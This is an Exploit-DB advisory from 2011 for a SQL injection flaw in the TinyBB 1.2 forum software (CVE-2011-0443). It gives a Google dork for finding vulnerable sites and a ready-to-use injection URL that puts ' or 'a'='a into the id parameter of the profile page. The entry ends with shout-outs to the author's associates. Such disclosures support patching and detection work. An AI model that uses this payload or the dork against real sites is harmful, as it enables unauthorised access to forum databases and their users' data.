TinyBB 1.2 - SQL Injection

Author: Aodrulez
type: webapps
platform: php
port: 
date_added: 2011-01-10  
date_updated: 2011-01-10  
verified: 1  
codes: CVE-2011-0443;OSVDB-70394  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comTinyBB_1.2.zip  

raw file: 15961.txt  

+-------------------------------+
| TinyBB 1.2 SQLi Vulnerability |
+-------------------------------+



Vulnerable Web-App : TinyBB 1.2
Vulnerability      : SQL Injection.
Author             : Aodrulez.
Email              : f3arm3d3ar@gmail.com
Google-Dork        : "TinyBB 2011 all rights reserved"
Tested on          : Ubuntu 10.04

+---------+
| Exploit |
+---------+

TinyBB Version 1.2 is vulnerable to SQLi.

http://127.0.0.1/index.php?page=profile&id=' or 'a'='a


+-------------------+
| Greetz Fly Out To |
+-------------------+


1] Amforked()          : My Mentor.
2] The Blue Genius     : My Boss.
3] www.orchidseven.com
4] www.malcon.org